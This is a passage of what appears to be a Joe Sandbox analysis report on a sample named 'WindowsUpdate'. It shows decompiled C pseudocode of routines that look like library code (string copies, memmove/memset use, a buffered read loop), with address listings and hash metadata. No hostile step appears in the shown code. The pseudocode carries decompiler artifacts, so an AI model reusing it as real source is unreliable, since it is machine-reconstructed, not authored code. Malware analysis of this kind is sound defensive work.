										_t75 =  *(_t91 + 0x47d688) & 0x0000000f;
									}
									_t105 =  *((char*)(_v584 + 0x47d6a8 + _t75 * 8));
									_t77 = _t105 >> 4;
									_v584 = _t105;
									_v584 = _t77;
									if(_t77 <= 7) {
										goto ( *((intOrPtr*)(0x465021 + _t77 * 4)));
									}
									_t72 = _v532;
									_t91 =  *_t72;
									_v533 = _t91;
									_v592 = _t91;
									if(_t91 != 0) {
										continue;
									}
									goto L22;
								}
							}
							L22:
							_t69 = _t97;
						}
					} else {
						_t80 = E003B2BC8(_t66);
						_t93 = _t80;
						if(_t93 == 0xffffffff || _t93 == 0xfffffffe) {
							_t97 = 0x483640;
						} else {
							_t97 = ((_t93 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t80 >> 5) * 4));
						}
						if(( *(_t97 + 0x24) & 0x0000007f) != 0) {
							goto L26;
						} else {
							if(_t93 == 0xffffffff || _t93 == 0xfffffffe) {
								_t94 = 0x483640;
							} else {
								_t94 = ((_t93 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t93 >> 5) * 4));
							}
							if(( *(_t94 + 0x24) & 0x00000080) != 0) {
								goto L26;
							} else {
								goto L12;
							}
						}
					}
				}
				_pop(_t103);
				_pop(_t109);
				_pop(_t86);
				if(_v624 != 0) {
					 *(_v628 + 0x70) =  *(_v628 + 0x70) & 0xfffffffd;
				}
				return E003ABE87(_t69, _t86, _v8 ^ _t111, _t97, _t103, _t109);
			}












































                                                                                                                    0x003b1245
                                                                                                                    0x003b124d
                                                                                                                    0x003b1257
                                                                                                                    0x003b1267
                                                                                                                    0x003b126d
                                                                                                                    0x003b1273
                                                                                                                    0x003b1279
                                                                                                                    0x003b127f
                                                                                                                    0x003b1285
                                                                                                                    0x003b128b
                                                                                                                    0x003b1291
                                                                                                                    0x003b1297
                                                                                                                    0x003b129d
                                                                                                                    0x003b12a7
                                                                                                                    0x003b12ad
                                                                                                                    0x003b12b5
                                                                                                                    0x003b1d86
                                                                                                                    0x003b1d8b
                                                                                                                    0x003b1d96
                                                                                                                    0x003b12bb
                                                                                                                    0x003b12bf
                                                                                                                    0x003b1324
                                                                                                                    0x003b1326
                                                                                                                    0x00000000
                                                                                                                    0x003b132c
                                                                                                                    0x003b132c
                                                                                                                    0x003b1330
                                                                                                                    0x003b1332
                                                                                                                    0x003b1338
                                                                                                                    0x003b133e
                                                                                                                    0x003b1344
                                                                                                                    0x003b134a
                                                                                                                    0x003b1350
                                                                                                                    0x003b1358
                                                                                                                    0x003b1364
                                                                                                                    0x003b136a
                                                                                                                    0x003b136b
                                                                                                                    0x003b1373
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003b1379
                                                                                                                    0x003b137e
                                                                                                                    0x003b138f
                                                                                                                    0x003b1380
                                                                                                                    0x003b138a
                                                                                                                    0x003b138a
                                                                                                                    0x003b1397
                                                                                                                    0x003b13a1
                                                                                                                    0x003b13a4
                                                                                                                    0x003b13b0
                                                                                                                    0x003b13b9
                                                                                                                    0x003b13bf
                                                                                                                    0x003b13bf
                                                                                                                    0x003b1d46
                                                                                                                    0x003b1d4c
                                                                                                                    0x003b1d4e
                                                                                                                    0x003b1d54
                                                                                                                    0x003b1d5c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003b1d5c
                                                                                                                    0x003b136a
                                                                                                                    0x003b1d62
                                                                                                                    0x003b1d62
                                                                                                                    0x003b1d62
                                                                                                                    0x003b12c1
                                                                                                                    0x003b12c2
                                                                                                                    0x003b12c8
                                                                                                                    0x003b12cd
                                                                                                                    0x003b12e8
                                                                                                                    0x003b12d4
                                                                                                                    0x003b12df
                                                                                                                    0x003b12df
                                                                                                                    0x003b12f1
                                                                                                                    0x00000000
                                                                                                                    0x003b12f7
                                                                                                                    0x003b12fa
                                                                                                                    0x003b1315
                                                                                                                    0x003b1301
                                                                                                                    0x003b130c
                                                                                                                    0x003b130c
                                                                                                                    0x003b131e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003b131e
                                                                                                                    0x003b12f1
                                                                                                                    0x003b12bf
                                                                                                                    0x003b1d6b
                                                                                                                    0x003b1d6c
                                                                                                                    0x003b1d6d
                                                                                                                    0x003b1d6e
                                                                                                                    0x003b1d76
                                                                                                                    0x003b1d76
                                                                                                                    0x003b1d85

                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003B129D
                                                                                                                      • Part of subcall function 003B0A4A: __getptd_noexit.LIBCMT ref: 003B0A4A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$UpdateUpdate::___getptd_noexit
                                                                                                                    • String ID: @6H$@6H$@XFG
                                                                                                                    • API String ID: 3393215657-1532833022
                                                                                                                    • Opcode ID: c46186abff3eba777254c28d3d0824cc50076727cb8c16f3a3e1561ec7b0e80c
                                                                                                                    • Instruction ID: 702cc9688e7779894df393375a21508d8ad7993082c214ae5a5d618951526e5c
                                                                                                                    • Opcode Fuzzy Hash: c46186abff3eba777254c28d3d0824cc50076727cb8c16f3a3e1561ec7b0e80c
                                                                                                                    • Instruction Fuzzy Hash: E151B171D112688FCB61DF2888A83EDBBF0AF49324F5446D9D51CEB691E7308E818F40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00311547 Relevance: 6.2, APIs: 4, Instructions: 221COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00311547(intOrPtr _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int* _v20;
				signed int _t78;
				signed int* _t80;
				signed int _t81;
				signed short _t84;
				signed short _t89;
				signed short _t94;
				signed short _t102;
				signed short _t109;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int* _t133;
				intOrPtr _t134;
				intOrPtr _t138;
				signed short* _t139;
				signed short _t140;
				signed short _t141;
				signed short _t142;
				signed short _t143;
				intOrPtr _t144;
				signed short* _t146;
				void* _t148;
				void* _t149;

				_t139 = _a8;
				if(_t139 != 0) {
					_t78 =  *_t139 & 0x0000ffff;
					if(_t78 <= 0) {
						_t132 = 0;
					} else {
						_t132 = (_t78 - 1) * 8 - _t78 - 1 << 3;
					}
					_t125 = _a4;
					_t4 = _t132 + 0x40; // 0x40
					_t80 = E002FE727(_a4, _t4);
					_t133 = _t80;
					_t149 = _t148 + 8;
					_v20 = _t133;
					if(_t133 != 0) {
						_t81 =  *_t139 & 0x0000ffff;
						_t133[0] = _t81;
						 *_t133 = _t81;
						_v12 = 0;
						if(0 <  *_t139) {
							_t134 = _t133 - _t139;
							_t146 =  &(_t139[4]);
							_v8 = _t134;
							do {
								_t140 =  *_t146;
								if(_t140 != 0) {
									_t84 = _t140;
									if( *_t140 != 0) {
										do {
											_t84 = _t84 + 1;
										} while ( *_t84 != 0);
									}
									_v16 = (_t84 - _t140 & 0x3fffffff) + 1;
									_t127 = E002FE727(_t125, (_t84 - _t140 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t127 != 0) {
										E00327337(_t127, _t140, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t127 = 0;
								}
								 *((intOrPtr*)(_t134 + _t146)) = _t127;
								_t141 = _t146[2];
								if(_t141 != 0) {
									_t89 = _t141;
									if( *_t141 != 0) {
										do {
											_t89 = _t89 + 1;
										} while ( *_t89 != 0);
									}
									_v16 = (_t89 - _t141 & 0x3fffffff) + 1;
									_t128 = E002FE727(_a4, (_t89 - _t141 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t128 != 0) {
										E00327337(_t128, _t141, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t128 = 0;
								}
								 *((intOrPtr*)(_t134 +  &(_t146[2]))) = _t128;
								_t142 = _t146[4];
								if(_t142 != 0) {
									_t94 = _t142;
									if( *_t142 != 0) {
										do {
											_t94 = _t94 + 1;
										} while ( *_t94 != 0);
									}
									_v16 = (_t94 - _t142 & 0x3fffffff) + 1;
									_t129 = E002FE727(_a4, (_t94 - _t142 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t129 != 0) {
										E00327337(_t129, _t142, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t129 = 0;
								}
								 *((intOrPtr*)(_t134 +  &(_t146[4]))) = _t129;
								 *((char*)(_t134 +  &(_t146[0xa]))) = _t146[0xa] & 0x000000ff;
								 *(_t134 +  &(_t146[0xc])) = _t146[0xc];
								 *((char*)(_t134 +  &(_t146[0xa]))) = _t146[0xa] & 0x000000ff;
								_t143 = _t146[0x18];
								if(_t143 != 0) {
									_t102 = _t143;
									if( *_t143 != 0) {
										do {
											_t102 = _t102 + 1;
										} while ( *_t102 != 0);
									}
									_v16 = (_t102 - _t143 & 0x3fffffff) + 1;
									_t130 = E002FE727(_a4, (_t102 - _t143 & 0x3fffffff) + 1);
									_t149 = _t149 + 8;
									if(_t130 != 0) {
										E00327337(_t130, _t143, _v16);
										_t149 = _t149 + 0xc;
									}
									_t134 = _v8;
								} else {
									_t130 = 0;
								}
								 *((intOrPtr*)(_t134 +  &(_t146[0x18]))) = _t130;
								 *((char*)(_t134 +  &(_t146[0xb]))) = _t146[0xb];
								 *(_t134 +  &(_t146[0x1a])) = _t146[0x1a];
								_t109 = _t146[6];
								 *(_t134 +  &(_t146[6])) = _t109;
								if(_t109 != 0) {
									 *((short*)(_t109 + 0x20)) =  *((short*)(_t109 + 0x20)) + 1;
								}
								_t125 = _a4;
								_t110 = E00310E17(_a4, _t146[8], _a12);
								_t144 = _v8;
								 *((intOrPtr*)(_t144 +  &(_t146[8]))) = _t110;
								 *((intOrPtr*)(_t144 +  &(_t146[0xe]))) = E002E6677(_a4, _t146[0xe], _a12, 0);
								_t112 = E00306BA7(_a4, _t146[0x10]);
								_t134 = _t144;
								_t138 = _v12 + 1;
								 *((intOrPtr*)(_t134 +  &(_t146[0x10]))) = _t112;
								 *(_t134 +  &(_t146[0x14])) = _t146[0x14];
								 *(_t134 +  &(_t146[0x16])) = _t146[0x16];
								_t149 = _t149 + 0x24;
								_t146 =  &(_t146[0x1c]);
								_v12 = _t138;
							} while (_t138 <  *_a8);
							_t133 = _v20;
						}
						return _t133;
					} else {
						return _t80;
					}
				} else {
					return 0;
				}
			}


































                                                                                                                    0x0031154e
                                                                                                                    0x00311553
                                                                                                                    0x0031155c
                                                                                                                    0x00311562
                                                                                                                    0x00311574
                                                                                                                    0x00311564
                                                                                                                    0x0031156f
                                                                                                                    0x0031156f
                                                                                                                    0x00311577
                                                                                                                    0x0031157a
                                                                                                                    0x0031157f
                                                                                                                    0x00311584
                                                                                                                    0x00311586
                                                                                                                    0x00311589
                                                                                                                    0x0031158e
                                                                                                                    0x00311596
                                                                                                                    0x00311599
                                                                                                                    0x0031159d
                                                                                                                    0x003115a2
                                                                                                                    0x003115ac
                                                                                                                    0x003115b2
                                                                                                                    0x003115b5
                                                                                                                    0x003115b8
                                                                                                                    0x003115bb
                                                                                                                    0x003115bb
                                                                                                                    0x003115bf
                                                                                                                    0x003115c8
                                                                                                                    0x003115ca
                                                                                                                    0x003115cc
                                                                                                                    0x003115cc
                                                                                                                    0x003115cd
                                                                                                                    0x003115cc
                                                                                                                    0x003115dc
                                                                                                                    0x003115e4
                                                                                                                    0x003115e6
                                                                                                                    0x003115eb
                                                                                                                    0x003115f2
                                                                                                                    0x003115f7
                                                                                                                    0x003115f7
                                                                                                                    0x003115fa
                                                                                                                    0x003115c1
                                                                                                                    0x003115c1
                                                                                                                    0x003115c1
                                                                                                                    0x003115fd
                                                                                                                    0x00311600
                                                                                                                    0x00311605
                                                                                                                    0x0031160e
                                                                                                                    0x00311610
                                                                                                                    0x00311617
                                                                                                                    0x00311617
                                                                                                                    0x00311618
                                                                                                                    0x00311617
                                                                                                                    0x00311629
                                                                                                                    0x00311631
                                                                                                                    0x00311633
                                                                                                                    0x00311638
                                                                                                                    0x0031163f
                                                                                                                    0x00311644
                                                                                                                    0x00311644
                                                                                                                    0x00311647
                                                                                                                    0x00311607
                                                                                                                    0x00311607
                                                                                                                    0x00311607
                                                                                                                    0x0031164a
                                                                                                                    0x0031164e
                                                                                                                    0x00311653
                                                                                                                    0x0031165c
                                                                                                                    0x0031165e
                                                                                                                    0x00311667
                                                                                                                    0x00311667
                                                                                                                    0x00311668
                                                                                                                    0x00311667
                                                                                                                    0x00311679
                                                                                                                    0x00311681
                                                                                                                    0x00311683
                                                                                                                    0x00311688
                                                                                                                    0x0031168f
                                                                                                                    0x00311694
                                                                                                                    0x00311694
                                                                                                                    0x00311697
                                                                                                                    0x00311655
                                                                                                                    0x00311655
                                                                                                                    0x00311655
                                                                                                                    0x0031169a
                                                                                                                    0x003116a2
                                                                                                                    0x003116a9
                                                                                                                    0x003116b1
                                                                                                                    0x003116b5
                                                                                                                    0x003116ba
                                                                                                                    0x003116c3
                                                                                                                    0x003116c5
                                                                                                                    0x003116c7
                                                                                                                    0x003116c7
                                                                                                                    0x003116c8
                                                                                                                    0x003116c7
                                                                                                                    0x003116d9
                                                                                                                    0x003116e1
                                                                                                                    0x003116e3
                                                                                                                    0x003116e8
                                                                                                                    0x003116ef
                                                                                                                    0x003116f4
                                                                                                                    0x003116f4
                                                                                                                    0x003116f7
                                                                                                                    0x003116bc
                                                                                                                    0x003116bc
                                                                                                                    0x003116bc
                                                                                                                    0x003116fa
                                                                                                                    0x00311701
                                                                                                                    0x00311708
                                                                                                                    0x0031170c
                                                                                                                    0x0031170f
                                                                                                                    0x00311715
                                                                                                                    0x00311717
                                                                                                                    0x00311717
                                                                                                                    0x0031171e
                                                                                                                    0x00311725
                                                                                                                    0x0031172a
                                                                                                                    0x00311732
                                                                                                                    0x0031173f
                                                                                                                    0x00311747
                                                                                                                    0x0031174f
                                                                                                                    0x00311751
                                                                                                                    0x00311752
                                                                                                                    0x00311759
                                                                                                                    0x00311760
                                                                                                                    0x00311767
                                                                                                                    0x0031176d
                                                                                                                    0x00311770
                                                                                                                    0x00311773
                                                                                                                    0x0031177b
                                                                                                                    0x0031177e
                                                                                                                    0x00311786
                                                                                                                    0x00311590
                                                                                                                    0x00311595
                                                                                                                    0x00311595
                                                                                                                    0x00311555
                                                                                                                    0x0031155b
                                                                                                                    0x0031155b

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a5cfa44bf03b20b72850cac4e78dce90d766afd3f216927f602a0fdccb3b748a
                                                                                                                    • Instruction ID: d5a29daadb86cda74dc38362987502fb6f37be59ca514215de0bb5c0374e746d
                                                                                                                    • Opcode Fuzzy Hash: a5cfa44bf03b20b72850cac4e78dce90d766afd3f216927f602a0fdccb3b748a
                                                                                                                    • Instruction Fuzzy Hash: 3A71F4759007459FCB268F74C840AFABBF5FF49314F18416DEE9687A01E236DA92CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002E6677 Relevance: 6.2, APIs: 4, Instructions: 201COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E002E6677(intOrPtr _a4, char _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				char _t72;
				signed int _t74;
				intOrPtr* _t95;
				intOrPtr _t100;
				void* _t105;
				signed int _t108;
				void* _t112;
				intOrPtr _t113;
				signed int _t121;
				char _t123;
				signed int _t126;
				char _t130;
				intOrPtr* _t132;
				char _t133;
				void* _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0) {
					return 0;
				} else {
					_t70 = _a12;
					_t132 = _a16;
					_t126 = _a12 & 0x00000001;
					_v12 = _t126;
					_v16 = 0;
					if(_t132 == 0) {
						_t72 = E002FE727(_a4, E002E5517(_t130, _t70));
						_t126 = _v12;
						_t136 = _t136 + 0x10;
						_t133 = _t72;
					} else {
						_t133 =  *_t132;
						_v16 = 0x8000;
					}
					_a8 = _t133;
					if(_t133 == 0) {
						L35:
						return _t133;
					} else {
						if(_t126 != 0) {
							if( *((intOrPtr*)(_t130 + 8)) != 0 ||  *((intOrPtr*)(_t130 + 0xc)) != 0 ||  *((intOrPtr*)(_t130 + 0x14)) != 0) {
								L11:
								_t74 = 0x2018;
							} else {
								_t74 = 0x4008;
								if( *((intOrPtr*)(_t130 + 0x10)) != 0) {
									goto L11;
								}
							}
						} else {
							_t74 = _t126 + 0x30;
						}
						_t108 =  *(_t130 + 2) & 0x0000ffff;
						_v8 = _t74;
						_t75 = _t74 & 0x00000fff;
						_v24 = _t74 & 0x00000fff;
						if((_t108 & 0x00000800) != 0) {
							L15:
							_v20 = 0;
						} else {
							_t124 =  *((intOrPtr*)(_t130 + 4));
							if( *((intOrPtr*)(_t130 + 4)) == 0) {
								goto L15;
							} else {
								_t105 = E00312267(_t124);
								_t136 = _t136 + 4;
								_v20 = _t105 + 1;
								_t75 = _v24;
							}
						}
						if(_t126 == 0) {
							if((_t108 & 0x00004000) == 0) {
								asm("sbb ebx, ebx");
								_t112 = ( ~(_t108 & 0x00002000) & 0xffffffe8) + 0x30;
							} else {
								_t112 = 8;
							}
							E00327337(_t133, _t130, _t112);
							E00327C87(_a8 + _t112, 0, 0x30 - _t112);
							_t137 = _t136 + 0x18;
						} else {
							E00327337(_t133, _t130, _t75);
							_t137 = _t136 + 0xc;
						}
						 *(_t133 + 2) = _v8 & 0x00006000 |  *(_t133 + 2) & 0x00001fff | _v16;
						_t120 = _v20;
						if(_v20 != 0) {
							 *((intOrPtr*)(_t133 + 4)) = _a8 + _v24;
							E00327337(_a8 + _v24,  *((intOrPtr*)(_t130 + 4)), _t120);
							_t137 = _t137 + 0xc;
						}
						_t121 =  *(_t130 + 2) & 0x0000ffff;
						_t113 = _a4;
						if(0 == (( *(_t133 + 2) | _t121) & 0x00004000)) {
							_push(_v12);
							_push( *((intOrPtr*)(_t130 + 0x10)));
							_push(_t113);
							if((_t121 & 0x00001000) == 0) {
								_t100 = E00303147();
							} else {
								_t100 = E00310E17();
							}
							 *((intOrPtr*)(_t133 + 0x10)) = _t100;
							_t137 = _t137 + 0xc;
						}
						if(( *(_t133 + 2) & 0x00006000) == 0) {
							 *((short*)(_t133 + 0x22)) = 0;
							if(( *(_t130 + 2) & 0x00004000) != 0) {
								goto L34;
							} else {
								 *((intOrPtr*)(_t133 + 8)) = E002E6677(_t113,  *((intOrPtr*)(_t130 + 8)), 0, 0);
								 *((intOrPtr*)(_t133 + 0xc)) = E002E6677(_t113,  *((intOrPtr*)(_t130 + 0xc)), 0, 0);
								return _t133;
							}
						} else {
							_t123 = _a8 + E002E54A7(_t130, _a12);
							_a8 = _t123;
							if(( *(_t133 + 2) & 0x00002000) != 0) {
								 *((intOrPtr*)(_t133 + 8)) = E002E6677(_t113,  *((intOrPtr*)(_t130 + 8)), 1,  &_a8);
								 *((intOrPtr*)(_t133 + 0xc)) = E002E6677(_t113,  *((intOrPtr*)(_t130 + 0xc)), 1,  &_a8);
								_t123 = _a8;
							}
							_t95 = _a16;
							if(_t95 != 0) {
								 *_t95 = _t123;
							}
							L34:
							goto L35;
						}
					}
				}
			}
























                                                                                                                    0x002e667e
                                                                                                                    0x002e6683
                                                                                                                    0x002e68a8
                                                                                                                    0x002e6689
                                                                                                                    0x002e6689
                                                                                                                    0x002e668d
                                                                                                                    0x002e6692
                                                                                                                    0x002e6695
                                                                                                                    0x002e6698
                                                                                                                    0x002e66a1
                                                                                                                    0x002e66b9
                                                                                                                    0x002e66be
                                                                                                                    0x002e66c1
                                                                                                                    0x002e66c4
                                                                                                                    0x002e66a3
                                                                                                                    0x002e66a3
                                                                                                                    0x002e66a5
                                                                                                                    0x002e66a5
                                                                                                                    0x002e66c6
                                                                                                                    0x002e66cb
                                                                                                                    0x002e685d
                                                                                                                    0x002e6864
                                                                                                                    0x002e66d1
                                                                                                                    0x002e66d3
                                                                                                                    0x002e66de
                                                                                                                    0x002e66f7
                                                                                                                    0x002e66f7
                                                                                                                    0x002e66ec
                                                                                                                    0x002e66f0
                                                                                                                    0x002e66f5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002e66f5
                                                                                                                    0x002e66d5
                                                                                                                    0x002e66d5
                                                                                                                    0x002e66d5
                                                                                                                    0x002e66fd
                                                                                                                    0x002e6701
                                                                                                                    0x002e6704
                                                                                                                    0x002e6709
                                                                                                                    0x002e6712
                                                                                                                    0x002e672d
                                                                                                                    0x002e672d
                                                                                                                    0x002e6714
                                                                                                                    0x002e6714
                                                                                                                    0x002e6719
                                                                                                                    0x00000000
                                                                                                                    0x002e671b
                                                                                                                    0x002e671c
                                                                                                                    0x002e6721
                                                                                                                    0x002e6725
                                                                                                                    0x002e6728
                                                                                                                    0x002e6728
                                                                                                                    0x002e6719
                                                                                                                    0x002e6736
                                                                                                                    0x002e674b
                                                                                                                    0x002e675c
                                                                                                                    0x002e6761
                                                                                                                    0x002e674d
                                                                                                                    0x002e674d
                                                                                                                    0x002e674d
                                                                                                                    0x002e6767
                                                                                                                    0x002e677c
                                                                                                                    0x002e6781
                                                                                                                    0x002e6738
                                                                                                                    0x002e673b
                                                                                                                    0x002e6740
                                                                                                                    0x002e6740
                                                                                                                    0x002e67a0
                                                                                                                    0x002e67a4
                                                                                                                    0x002e67a9
                                                                                                                    0x002e67b2
                                                                                                                    0x002e67b9
                                                                                                                    0x002e67be
                                                                                                                    0x002e67be
                                                                                                                    0x002e67c1
                                                                                                                    0x002e67c9
                                                                                                                    0x002e67dc
                                                                                                                    0x002e67de
                                                                                                                    0x002e67e1
                                                                                                                    0x002e67e4
                                                                                                                    0x002e67eb
                                                                                                                    0x002e67f4
                                                                                                                    0x002e67ed
                                                                                                                    0x002e67ed
                                                                                                                    0x002e67ed
                                                                                                                    0x002e67f9
                                                                                                                    0x002e67fc
                                                                                                                    0x002e67fc
                                                                                                                    0x002e6808
                                                                                                                    0x002e6867
                                                                                                                    0x002e6874
                                                                                                                    0x00000000
                                                                                                                    0x002e6876
                                                                                                                    0x002e6887
                                                                                                                    0x002e6896
                                                                                                                    0x002e68a1
                                                                                                                    0x002e68a1
                                                                                                                    0x002e680a
                                                                                                                    0x002e6816
                                                                                                                    0x002e6820
                                                                                                                    0x002e6827
                                                                                                                    0x002e6838
                                                                                                                    0x002e684a
                                                                                                                    0x002e684d
                                                                                                                    0x002e6850
                                                                                                                    0x002e6853
                                                                                                                    0x002e6858
                                                                                                                    0x002e685a
                                                                                                                    0x002e685a
                                                                                                                    0x002e685c
                                                                                                                    0x00000000
                                                                                                                    0x002e685c
                                                                                                                    0x002e6808
                                                                                                                    0x002e66cb

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1357608183-0
                                                                                                                    • Opcode ID: 8dad90dc06fccf1d0fce5a3f5a61b94d905bb9cd5d45d26637a828d7000bc66e
                                                                                                                    • Instruction ID: 7bf18443a9ad8fe9dfb748977b2621903e79dac7c422a396912a19ebd4aa50c9
                                                                                                                    • Opcode Fuzzy Hash: 8dad90dc06fccf1d0fce5a3f5a61b94d905bb9cd5d45d26637a828d7000bc66e
                                                                                                                    • Instruction Fuzzy Hash: 2F6137B1960646ABEB24DF56C845BBBF7B8FF14344F448028F9189B640E339D960CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00329500 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 69%
                                                                                                                    			E00329500(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00327C87(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E0032F3E8(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00327C87(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E0032C705())) = 0x22;
												L4:
												E0032C696();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v8 = _t110 + 1;
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0032EF23(_t119));
											_t88 = E00330139();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E0032FFB2(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
